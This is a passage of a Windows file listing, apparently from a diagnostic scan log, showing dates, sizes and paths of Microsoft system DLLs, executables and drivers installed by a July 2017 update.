2017-07-11 20:54 - 2017-06-20 07:08 - 000327168 _____ (Microsoft Corporation) C:\WINDOWS\system32\WinBioDataModel.dll
2017-07-11 20:54 - 2017-06-20 07:08 - 000274944 _____ (Microsoft Corporation) C:\WINDOWS\system32\dxtrans.dll
2017-07-11 20:54 - 2017-06-20 07:07 - 002475136 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\d3d10warp.dll
2017-07-11 20:54 - 2017-06-20 07:07 - 000823296 _____ (Microsoft Corporation) C:\WINDOWS\system32\MbaeApi.dll
2017-07-11 20:54 - 2017-06-20 07:07 - 000632832 _____ (Microsoft Corporation) C:\WINDOWS\system32\tileobjserver.dll
2017-07-11 20:54 - 2017-06-20 07:07 - 000510976 _____ (Microsoft Corporation) C:\WINDOWS\system32\TDLMigration.dll
2017-07-11 20:54 - 2017-06-20 07:07 - 000346016 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\CloudExperienceHostCommon.dll
2017-07-11 20:54 - 2017-06-20 07:07 - 000138656 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\CloudExperienceHostUser.dll
2017-07-11 20:54 - 2017-06-20 07:06 - 000942592 _____ (Microsoft Corporation) C:\WINDOWS\system32\wbiosrvc.dll
2017-07-11 20:54 - 2017-06-20 07:06 - 000847872 _____ (Microsoft Corporation) C:\WINDOWS\system32\bisrv.dll
2017-07-11 20:54 - 2017-06-20 07:06 - 000754592 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\LicenseManager.dll
2017-07-11 20:54 - 2017-06-20 07:06 - 000751104 _____ (Microsoft Corporation) C:\WINDOWS\system32\msfeeds.dll
2017-07-11 20:54 - 2017-06-20 07:06 - 000411648 _____ (Microsoft Corporation) C:\WINDOWS\system32\ActivationManager.dll
2017-07-11 20:54 - 2017-06-20 07:06 - 000278944 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\thumbcache.dll
2017-07-11 20:54 - 2017-06-20 07:05 - 000687616 _____ (Microsoft Corporation) C:\WINDOWS\system32\LogonController.dll
2017-07-11 20:54 - 2017-06-20 07:05 - 000585216 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppReadiness.dll
2017-07-11 20:54 - 2017-06-20 07:05 - 000438096 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.ApplicationModel.dll
2017-07-11 20:54 - 2017-06-20 07:05 - 000417792 _____ (Microsoft Corporation) C:\WINDOWS\system32\InstallAgentUserBroker.exe
2017-07-11 20:54 - 2017-06-20 07:05 - 000374784 _____ (Microsoft Corporation) C:\WINDOWS\system32\InstallAgent.exe
2017-07-11 20:54 - 2017-06-20 07:05 - 000364032 _____ (Microsoft Corporation) C:\WINDOWS\system32\SearchProtocolHost.exe
2017-07-11 20:54 - 2017-06-20 07:04 - 002330520 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\combase.dll
2017-07-11 20:54 - 2017-06-20 07:04 - 001178528 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\AppxPackaging.dll
2017-07-11 20:54 - 2017-06-20 07:04 - 001177600 _____ (Microsoft Corporation) C:\WINDOWS\system32\Unistore.dll
2017-07-11 20:54 - 2017-06-20 07:04 - 001077496 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\webservices.dll
2017-07-11 20:54 - 2017-06-20 07:04 - 000181656 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\AppxAllUserStore.dll
2017-07-11 20:54 - 2017-06-20 07:04 - 000049656 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msasn1.dll
2017-07-11 20:54 - 2017-06-20 07:03 - 005806048 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Media.dll
2017-07-11 20:54 - 2017-06-20 07:03 - 002077184 _____ (Microsoft Corporation) C:\WINDOWS\system32\inetcpl.cpl
2017-07-11 20:54 - 2017-06-20 07:03 - 000864240 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\AudioSes.dll
2017-07-11 20:54 - 2017-06-20 07:03 - 000443728 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MFCaptureEngine.dll
2017-07-11 20:54 - 2017-06-20 07:02 - 003377664 _____ (Microsoft Corporation) C:\WINDOWS\system32\tquery.dll
2017-07-11 20:54 - 2017-06-20 07:02 - 001121928 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mfsvr.dll
2017-07-11 20:54 - 2017-06-20 07:02 - 000354400 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MMDevAPI.dll
2017-07-11 20:54 - 2017-06-20 07:01 - 004536320 _____ (Microsoft Corporation) C:\WINDOWS\system32\MFMediaEngine.dll
2017-07-11 20:54 - 2017-06-20 07:01 - 000176032 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\basecsp.dll
2017-07-11 20:54 - 2017-06-20 07:00 - 002597888 _____ (Microsoft Corporation) C:\WINDOWS\system32\mssrch.dll
2017-07-11 20:54 - 2017-06-20 06:59 - 002938880 _____ (Microsoft Corporation) C:\WINDOWS\system32\InputService.dll
2017-07-11 20:54 - 2017-06-20 06:59 - 001674240 _____ (Microsoft Corporation) C:\WINDOWS\system32\wpncore.dll
2017-07-11 20:54 - 2017-06-20 06:56 - 000985600 _____ (Microsoft Corporation) C:\WINDOWS\system32\TSWorkspace.dll
2017-07-11 20:54 - 2017-06-20 06:49 - 000899072 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msctfuimanager.dll
2017-07-11 20:54 - 2017-06-20 06:49 - 000331776 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\oleacc.dll
2017-07-11 20:54 - 2017-06-20 06:46 - 000132096 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Microsoft.Bluetooth.Profiles.Gatt.Interface.dll
2017-07-11 20:54 - 2017-06-20 06:45 - 000111104 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.System.Profile.RetailInfo.dll
2017-07-11 20:54 - 2017-06-20 06:45 - 000064000 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MshtmlDac.dll
2017-07-11 20:54 - 2017-06-20 06:43 - 000329728 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\webplatstorageserver.dll
2017-07-11 20:54 - 2017-06-20 06:43 - 000173568 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ClipboardServer.dll
2017-07-11 20:54 - 2017-06-20 06:43 - 000151552 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wincredui.dll
2017-07-11 20:54 - 2017-06-20 06:43 - 000139776 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\BluetoothApis.dll
2017-07-11 20:54 - 2017-06-20 06:43 - 000124928 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\iepeers.dll
2017-07-11 20:54 - 2017-06-20 06:43 - 000080384 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mshtmled.dll
2017-07-11 20:54 - 2017-06-20 06:43 - 000052224 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dataclen.dll
2017-07-11 20:54 - 2017-06-20 06:42 - 000641024 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\certca.dll
2017-07-11 20:54 - 2017-06-20 06:42 - 000387584 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Payments.dll
2017-07-11 20:54 - 2017-06-20 06:42 - 000338432 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\iedkcs32.dll
2017-07-11 20:54 - 2017-06-20 06:42 - 000266240 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dxtrans.dll
2017-07-11 20:54 - 2017-06-20 06:42 - 000226304 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\scksp.dll
2017-07-11 20:54 - 2017-06-20 06:42 - 000121856 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\sendmail.dll
2017-07-11 20:54 - 2017-06-20 06:41 - 000734208 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\bcastdvr.exe
2017-07-11 20:54 - 2017-06-20 06:41 - 000646656 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MbaeApi.dll
2017-07-11 20:54 - 2017-06-20 06:41 - 000601088 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\SndVolSSO.dll
2017-07-11 20:54 - 2017-06-20 06:41 - 000433152 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Internal.Bluetooth.dll
2017-07-11 20:54 - 2017-06-20 06:41 - 000201216 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\credprovhost.dll
2017-07-11 20:54 - 2017-06-20 06:40 - 000368128 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\InstallAgentUserBroker.exe
2017-07-11 20:54 - 2017-06-20 06:40 - 000356864 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ActivationManager.dll
2017-07-11 20:54 - 2017-06-20 06:40 - 000342016 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\certcli.dll
2017-07-11 20:54 - 2017-06-20 06:40 - 000247808 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\AboveLockAppHost.dll
2017-07-11 20:54 - 2017-06-20 06:40 - 000230912 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\edputil.dll
2017-07-11 20:54 - 2017-06-20 06:40 - 000038400 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\TokenBrokerUI.dll
2017-07-11 20:54 - 2017-06-20 06:39 - 002814464 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\themeui.dll
2017-07-11 20:54 - 2017-06-20 06:39 - 002671616 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\tquery.dll
2017-07-11 20:54 - 2017-06-20 06:39 - 000969728 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Unistore.dll
2017-07-11 20:54 - 2017-06-20 06:39 - 000646144 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mmsys.cpl
2017-07-11 20:54 - 2017-06-20 06:39 - 000471040 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\VAN.dll
2017-07-11 20:54 - 2017-06-20 06:39 - 000312320 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\SearchProtocolHost.exe
2017-07-11 20:54 - 2017-06-20 06:38 - 001451008 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\UIAutomationCore.dll
2017-07-11 20:54 - 2017-06-20 06:38 - 001285120 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dbghelp.dll
2017-07-11 20:54 - 2017-06-20 06:38 - 001171968 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\certutil.exe
2017-07-11 20:54 - 2017-06-20 06:38 - 000663040 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msfeeds.dll
2017-07-11 20:54 - 2017-06-20 06:38 - 000648192 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\SmartcardCredentialProvider.dll
2017-07-11 20:54 - 2017-06-20 06:38 - 000329728 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\InstallAgent.exe
2017-07-11 20:54 - 2017-06-20 06:37 - 002008576 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\inetcpl.cpl
2017-07-11 20:54 - 2017-06-20 06:36 - 003667456 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\D3DCompiler_47.dll
2017-07-11 20:54 - 2017-06-20 06:35 - 002679296 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\SRH.dll
2017-07-11 20:54 - 2017-06-20 06:35 - 002132480 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mssrch.dll
2017-07-11 20:54 - 2017-06-20 06:35 - 000050176 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\cldapi.dll
2017-07-11 20:54 - 2017-06-20 06:34 - 004056576 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MFMediaEngine.dll
2017-07-11 20:54 - 2017-06-20 06:34 - 002750464 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\CertEnroll.dll
2017-07-11 20:54 - 2017-06-20 06:34 - 002211328 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\InputService.dll
2017-07-11 20:54 - 2017-06-20 06:34 - 001492480 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Devices.Bluetooth.dll
2017-07-11 20:54 - 2017-06-20 06:34 - 000760832 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\rasapi32.dll
2017-07-11 20:54 - 2017-06-20 06:31 - 000334848 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\PlayToDevice.dll
2017-07-11 20:54 - 2017-06-20 06:30 - 000209920 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wdmaud.drv
2017-07-11 20:54 - 2017-06-20 06:30 - 000157696 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\rpchttp.dll
2017-07-11 20:54 - 2017-06-20 06:30 - 000089088 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\olepro32.dll
2017-07-11 20:54 - 2017-06-20 06:28 - 000584192 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\apphelp.dll
2017-07-11 20:53 - 2017-07-07 09:27 - 001147288 _____ (Microsoft Corporation) C:\WINDOWS\system32\hvix64.exe
2017-07-11 20:53 - 2017-07-07 09:27 - 001024928 _____ (Microsoft Corporation) C:\WINDOWS\system32\hvax64.exe
2017-07-11 20:53 - 2017-07-07 09:27 - 000965024 _____ (Microsoft Corporation) C:\WINDOWS\system32\hvloader.efi
2017-07-11 20:53 - 2017-07-07 09:27 - 000821664 _____ (Microsoft Corporation) C:\WINDOWS\system32\hvloader.exe
2017-07-11 20:53 - 2017-07-07 09:27 - 000750560 _____ (Microsoft Corporation) C:\WINDOWS\system32\fontdrvhost.exe
2017-07-11 20:53 - 2017-07-07 09:26 - 001065104 _____ (Microsoft Corporation) C:\WINDOWS\system32\winresume.efi
2017-07-11 20:53 - 2017-07-07 09:25 - 000899824 _____ (Microsoft Corporation) C:\WINDOWS\system32\winresume.exe
2017-07-11 20:53 - 2017-07-07 09:22 - 008318880 _____ (Microsoft Corporation) C:\WINDOWS\system32\ntoskrnl.exe
2017-07-11 20:53 - 2017-07-07 09:22 - 001186464 _____ (Microsoft Corporation) C:\WINDOWS\system32\winload.exe
2017-07-11 20:53 - 2017-07-07 09:22 - 000119384 _____ (Microsoft Corporation) C:\WINDOWS\system32\dmcmnutils.dll
2017-07-11 20:53 - 2017-07-07 09:21 - 002969880 _____ (Microsoft Corporation) C:\WINDOWS\system32\CoreUIComponents.dll
2017-07-11 20:53 - 2017-07-07 09:20 - 000923040 _____ (Microsoft Corporation) C:\WINDOWS\system32\CoreMessaging.dll
2017-07-11 20:53 - 2017-07-07 09:20 - 000382368 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\clfs.sys
2017-07-11 20:53 - 2017-07-07 09:17 - 001017760 _____ (Microsoft Corporation) C:\WINDOWS\system32\SecConfig.efi
2017-07-11 20:53 - 2017-07-07 09:15 - 002444696 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\dxgkrnl.sys
2017-07-11 20:53 - 2017-07-07 09:14 - 007325584 _____ (Microsoft Corporation) C:\WINDOWS\system32\windows.storage.dll
2017-07-11 20:53 - 2017-07-07 09:14 - 005477088 _____ (Microsoft Corporation) C:\WINDOWS\system32\OneCoreUAPCommonProxyStub.dll
2017-07-11 20:53 - 2017-07-07 09:14 - 001760264 _____ (Microsoft Corporation) C:\WINDOWS\system32\WindowsCodecs.dll
2017-07-11 20:53 - 2017-07-07 09:14 - 001171032 _____ (Microsoft Corporation) C:\WINDOWS\system32\dcomp.dll
2017-07-11 20:53 - 2017-07-07 09:13 - 000872472 _____ (Microsoft Corporation) C:\WINDOWS\system32\ClipSVC.dll
2017-07-11 20:53 - 2017-07-07 09:13 - 000147800 _____ (Microsoft Corporation) C:\WINDOWS\system32\Clipc.dll
2017-07-11 20:53 - 2017-07-07 09:12 - 000411040 _____ (Microsoft Corporation) C:\WINDOWS\system32\msv1_0.dll
2017-07-11 20:53 - 2017-07-07 09:12 - 000318232 _____ (Microsoft Corporation) C:\WINDOWS\system32\wininit.exe
2017-07-11 20:53 - 2017-07-07 09:12 - 000228256 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\mrxsmb20.sys
2017-07-11 20:53 - 2017-07-07 09:11 - 007904784 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Media.Protection.PlayReady.dll
2017-07-11 20:53 - 2017-07-07 09:10 - 021353208 _____ (Microsoft Corporation) C:\WINDOWS\system32\shell32.dll
2017-07-11 20:53 - 2017-07-07 09:10 - 001337848 _____ (Microsoft Corporation) C:\WINDOWS\system32\AudioEng.dll
2017-07-11 20:53 - 2017-07-07 09:10 - 000372128 _____ (Microsoft Corporation) C:\WINDOWS\system32\CloudExperienceHost.dll
2017-07-11 20:53 - 2017-07-07 09:09 - 000041376 _____ (Microsoft Corporation) C:\WINDOWS\system32\wininitext.dll
2017-07-11 20:53 - 2017-07-07 08:27 - 003670016 _____ (Microsoft Corporation) C:\WINDOWS\system32\win32kfull.sys
2017-07-11 20:53 - 2017-07-07 08:27 - 001640448 _____ (Microsoft Corporation) C:\WINDOWS\system32\GdiPlus.dll
2017-07-11 20:53 - 2017-07-07 08:27 - 001050624 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.dll
2017-07-11 20:53 - 2017-07-07 08:27 - 000859136 _____ (Microsoft Corporation) C:\WINDOWS\system32\uDWM.dll
2017-07-11 20:53 - 2017-07-07 08:27 - 000577024 _____ (Microsoft Corporation) C:\WINDOWS\system32\duser.dll
2017-07-11 20:53 - 2017-07-07 08:27 - 000443392 _____ (Microsoft Corporation) C:\WINDOWS\system32\PerceptionSimulationExtensions.dll
2017-07-11 20:53 - 2017-07-07 08:27 - 000360960 _____ (Microsoft Corporation) C:\WINDOWS\system32\ConhostV2.dll
2017-07-11 20:53 - 2017-07-07 08:26 - 017364992 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.Xaml.dll
2017-07-11 20:53 - 2017-07-07 08:25 - 002199552 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.Xaml.Resources.dll
2017-07-11 20:53 - 2017-07-07 08:24 - 000114688 _____ (Microsoft Corporation) C:\WINDOWS\system32\officecsp.dll
2017-07-11 20:53 - 2017-07-07 08:23 - 000113152 _____ (Microsoft Corporation) C:\WINDOWS\system32\wuuhosdeployment.dll
2017-07-11 20:53 - 2017-07-07 08:23 - 000029696 _____ (Microsoft Corporation) C:\WINDOWS\system32\eapprovp.dll
2017-07-11 20:53 - 2017-07-07 08:22 - 007931392 _____ (Microsoft Corporation) C:\WINDOWS\system32\twinui.dll
2017-07-11 20:53 - 2017-07-07 08:22 - 000520704 _____ (Microsoft Corporation) C:\WINDOWS\system32\daxexec.dll
2017-07-11 20:53 - 2017-07-07 08:21 - 000096256 _____ (Microsoft Corporation) C:\WINDOWS\system32\ActiveSyncCsp.dll
2017-07-11 20:53 - 2017-07-07 08:21 - 000064512 _____ (Microsoft Corporation) C:\WINDOWS\system32\winsrv.dll
2017-07-11 20:53 - 2017-07-07 08:19 - 000527360 _____ (Microsoft Corporation) C:\WINDOWS\system32\aadcloudap.dll
2017-07-11 20:53 - 2017-07-07 08:19 - 000256000 _____ (Microsoft Corporation) C:\WINDOWS\system32\domgmt.dll
2017-07-11 20:53 - 2017-07-07 08:19 - 000137216 _____ (Microsoft Corporation) C:\WINDOWS\system32\raschap.dll
2017-07-11 20:53 - 2017-07-07 08:18 - 007336448 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Data.Pdf.dll
2017-07-11 20:53 - 2017-07-07 08:18 - 000563712 _____ (Microsoft Corporation) C:\WINDOWS\system32\DevicePairing.dll
2017-07-11 20:53 - 2017-07-07 08:18 - 000353280 _____ (Microsoft Corporation) C:\WINDOWS\system32\Wldap32.dll
2017-07-11 20:53 - 2017-07-07 08:18 - 000274944 _____ (Microsoft Corporation) C:\WINDOWS\system32\WindowsCodecsExt.dll
2017-07-11 20:53 - 2017-07-07 08:17 - 001878016 _____ (Microsoft Corporation) C:\WINDOWS\system32\AzureSettingSyncProvider.dll
2017-07-11 20:53 - 2017-07-07 08:17 - 001260544 _____ (Microsoft Corporation) C:\WINDOWS\system32\GamePanel.exe
2017-07-11 20:53 - 2017-07-07 08:17 - 000536064 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Internal.Management.dll
2017-07-11 20:53 - 2017-07-07 08:17 - 000229888 _____ (Microsoft Corporation) C:\WINDOWS\system32\SIHClient.exe
2017-07-11 20:53 - 2017-07-07 08:16 - 000925696 _____ (Microsoft Corporation) C:\WINDOWS\system32\WpcWebFilter.dll
2017-07-11 20:53 - 2017-07-07 08:15 - 000922112 _____ (Microsoft Corporation) C:\WINDOWS\system32\kerberos.dll
2017-07-11 20:53 - 2017-07-07 08:14 - 001802240 _____ (Microsoft Corporation) C:\WINDOWS\system32\urlmon.dll
2017-07-11 20:53 - 2017-07-07 08:14 - 000497152 _____ (Microsoft Corporation) C:\WINDOWS\system32\rastls.dll
2017-07-11 20:53 - 2017-07-07 08:13 - 005892096 _____ (Microsoft Corporation) C:\WINDOWS\system32\d2d1.dll
2017-07-11 20:53 - 2017-07-07 08:13 - 000840192 _____ (Microsoft Corporation) C:\WINDOWS\system32\fveapi.dll
2017-07-11 20:53 - 2017-07-07 08:12 - 003307008 _____ (Microsoft Corporation) C:\WINDOWS\system32\wininet.dll
2017-07-11 20:53 - 2017-07-07 08:12 - 002499584 _____ (Microsoft Corporation) C:\WINDOWS\system32\twinui.pcshell.dll
2017-07-11 20:53 - 2017-07-07 08:12 - 002055168 _____ (Microsoft Corporation) C:\WINDOWS\system32\win32kbase.sys
2017-07-11 20:53 - 2017-07-07 08:12 - 001713664 _____ (Microsoft Corporation) C:\WINDOWS\system32\ActiveSyncProvider.dll
2017-07-11 20:53 - 2017-07-07 08:12 - 001420800 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.Xaml.Maps.dll
2017-07-11 20:53 - 2017-07-07 08:12 - 001305088 _____ (Microsoft Corporation) C:\WINDOWS\system32\dosvc.dll
2017-07-11 20:53 - 2017-07-07 08:12 - 001293824 _____ (Microsoft Corporation) C:\WINDOWS\system32\aadtb.dll
2017-07-11 20:53 - 2017-07-07 08:11 - 003139584 _____ (Microsoft Corporation) C:\WINDOWS\system32\msftedit.dll
2017-07-11 20:53 - 2017-07-07 08:11 - 002829824 _____ (Microsoft Corporation) C:\WINDOWS\system32\DWrite.dll
2017-07-11 20:53 - 2017-07-07 08:11 - 002649600 _____ (Microsoft Corporation) C:\WINDOWS\system32\dwmcore.dll
2017-07-11 20:53 - 2017-07-07 08:11 - 002177024 _____ (Microsoft Corporation) C:\WINDOWS\system32\OpcServices.dll
2017-07-11 20:53 - 2017-07-07 08:11 - 001888256 _____ (Microsoft Corporation) C:\WINDOWS\system32\FntCache.dll
2017-07-11 20:53 - 2017-07-07 08:11 - 000986112 _____ (Microsoft Corporation) C:\WINDOWS\system32\wuapi.dll
2017-07-11 20:53 - 2017-07-07 08:11 - 000406528 _____ (Microsoft Corporation) C:\WINDOWS\system32\wuuhext.dll
2017-07-11 20:53 - 2017-07-07 08:10 - 005557760 _____ (Microsoft Corporation) C:\WINDOWS\system32\dbgeng.dll
2017-07-11 20:53 - 2017-07-07 08:10 - 004707840 _____ (Microsoft Corporation) C:\WINDOWS\system32\ExplorerFrame.dll
2017-07-11 20:53 - 2017-07-07 08:10 - 002444288 _____ (Microsoft Corporation) C:\WINDOWS\system32\wuaueng.dll 2017-07-11 20:53 - 2017-07-07 08:07 - 000430080 _____ (Microsoft Corporation) C:\WINDOWS\system32\PlayToDevice.dll 2017-07-11 20:53 - 2017-07-07 08:07 - 000391168 _____ (Microsoft Corporation) C:\WINDOWS\system32\WMPhoto.dll 2017-07-11 20:53 - 2017-07-07 08:05 - 000370176 _____ (Microsoft Corporation) C:\WINDOWS\system32\msinfo32.exe 2017-07-11 20:53 - 2017-07-07 08:04 - 001703424 _____ (Microsoft Corporation) C:\WINDOWS\system32\aitstatic.exe 2017-07-11 20:53 - 2017-07-07 08:04 - 001403392 _____ (Microsoft Corporation) C:\WINDOWS\system32\wdc.dll 2017-07-11 20:53 - 2017-07-07 08:04 - 000058368 _____ (Microsoft Corporation) C:\WINDOWS\system32\csrsrv.dll 2017-07-11 20:53 - 2017-07-02 00:52 - 000031932 _____ C:\WINDOWS\system32\edgehtmlpluginpolicy.bin 2017-07-11 20:53 - 2017-06-20 08:18 - 001564576 _____ (Microsoft Corporation) C:\WINDOWS\system32\appraiser.dll 2017-07-11 20:53 - 2017-06-20 08:18 - 000096672 _____ (Microsoft Corporation) C:\WINDOWS\system32\CompatTelRunner.exe 2017-07-11 20:53 - 2017-06-20 08:17 - 000629152 _____ (Microsoft Corporation) C:\WINDOWS\system32\generaltel.dll 2017-07-11 20:53 - 2017-06-20 08:17 - 000544160 _____ (Microsoft Corporation) C:\WINDOWS\system32\devinv.dll 2017-07-11 20:53 - 2017-06-20 08:17 - 000334240 _____ (Microsoft Corporation) C:\WINDOWS\system32\invagent.dll 2017-07-11 20:53 - 2017-06-20 08:17 - 000136096 _____ (Microsoft Corporation) C:\WINDOWS\system32\acmigration.dll 2017-07-11 20:53 - 2017-06-20 08:17 - 000034720 _____ (Microsoft Corporation) C:\WINDOWS\system32\DeviceCensus.exe 2017-07-11 20:53 - 2017-06-20 08:16 - 001214880 _____ (Microsoft Corporation) C:\WINDOWS\system32\aeinv.dll 2017-07-11 20:53 - 2017-06-20 08:16 - 000335776 _____ (Microsoft Corporation) C:\WINDOWS\system32\dcntel.dll 2017-07-11 20:53 - 2017-06-20 08:15 - 000233376 _____ (Microsoft Corporation) C:\WINDOWS\system32\aepic.dll 2017-07-11 
20:53 - 2017-06-20 08:11 - 001395152 _____ (Microsoft Corporation) C:\WINDOWS\system32\winload.efi 2017-07-11 20:53 - 2017-06-20 08:10 - 002327456 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\ntfs.sys 2017-07-11 20:53 - 2017-06-20 08:10 - 001930320 _____ (Microsoft Corporation) C:\WINDOWS\system32\ntdll.dll 2017-07-11 20:53 - 2017-06-20 08:05 - 001057832 _____ (Microsoft Corporation) C:\WINDOWS\system32\MrmCoreR.dll 2017-07-11 20:53 - 2017-06-20 08:04 - 004847424 _____ (Microsoft Corporation) C:\WINDOWS\explorer.exe 2017-07-11 20:53 - 2017-06-20 08:04 - 000472728 _____ (Microsoft Corporation) C:\WINDOWS\system32\policymanager.dll 2017-07-11 20:53 - 2017-06-20 08:03 - 000179608 _____ (Microsoft Corporation) C:\WINDOWS\system32\CloudExperienceHostUser.dll 2017-07-11 20:53 - 2017-06-20 08:03 - 000102312 _____ (Microsoft Corporation) C:\WINDOWS\system32\CredentialUIBroker.exe 2017-07-11 20:53 - 2017-06-20 08:02 - 002645688 _____ (Microsoft Corporation) C:\WINDOWS\system32\iertutil.dll 2017-07-11 20:53 - 2017-06-20 08:02 - 000426912 _____ (Microsoft Corporation) C:\WINDOWS\system32\CloudExperienceHostCommon.dll 2017-07-11 20:53 - 2017-06-20 08:00 - 000558920 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.ApplicationModel.dll 2017-07-11 20:53 - 2017-06-20 08:00 - 000255904 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppxAllUserStore.dll 2017-07-11 20:53 - 2017-06-20 08:00 - 000142752 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\wcifs.sys 2017-07-11 20:53 - 2017-06-20 07:59 - 001054280 _____ (Microsoft Corporation) C:\WINDOWS\system32\AudioSes.dll 2017-07-11 20:53 - 2017-06-20 07:59 - 000583304 _____ (Microsoft Corporation) C:\WINDOWS\system32\audiodg.exe 2017-07-11 20:53 - 2017-06-20 07:58 - 000833160 _____ (Microsoft Corporation) C:\WINDOWS\system32\EditionUpgradeManagerObj.dll 2017-07-11 20:53 - 2017-06-20 07:58 - 000406072 _____ (Microsoft Corporation) C:\WINDOWS\system32\MMDevAPI.dll 2017-07-11 20:53 - 2017-06-20 07:58 - 
000203168 _____ (Microsoft Corporation) C:\WINDOWS\system32\CloudExperienceHostBroker.dll 2017-07-11 20:53 - 2017-06-20 07:57 - 000204192 _____ (Microsoft Corporation) C:\WINDOWS\system32\basecsp.dll 2017-07-11 20:53 - 2017-06-20 07:16 - 000970752 _____ (Microsoft Corporation) C:\WINDOWS\system32\msctfuimanager.dll 2017-07-11 20:53 - 2017-06-20 07:16 - 000417280 _____ (Microsoft Corporation) C:\WINDOWS\system32\oleacc.dll 2017-07-11 20:53 - 2017-06-20 07:15 - 001620368 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ntdll.dll 2017-07-11 20:53 - 2017-06-20 07:14 - 001150784 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ucrtbase.dll 2017-07-11 20:53 - 2017-06-20 07:14 - 000032768 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\mskssrv.sys 2017-07-11 20:53 - 2017-06-20 07:13 - 000216064 _____ (Microsoft Corporation) C:\WINDOWS\system32\Microsoft.Bluetooth.Profiles.Gatt.Interface.dll 2017-07-11 20:53 - 2017-06-20 07:13 - 000081408 _____ (Microsoft Corporation) C:\WINDOWS\system32\wwanprotdim.dll 2017-07-11 20:53 - 2017-06-20 07:13 - 000064000 _____ (Microsoft Corporation) C:\WINDOWS\system32\WFDSConMgr.dll 2017-07-11 20:53 - 2017-06-20 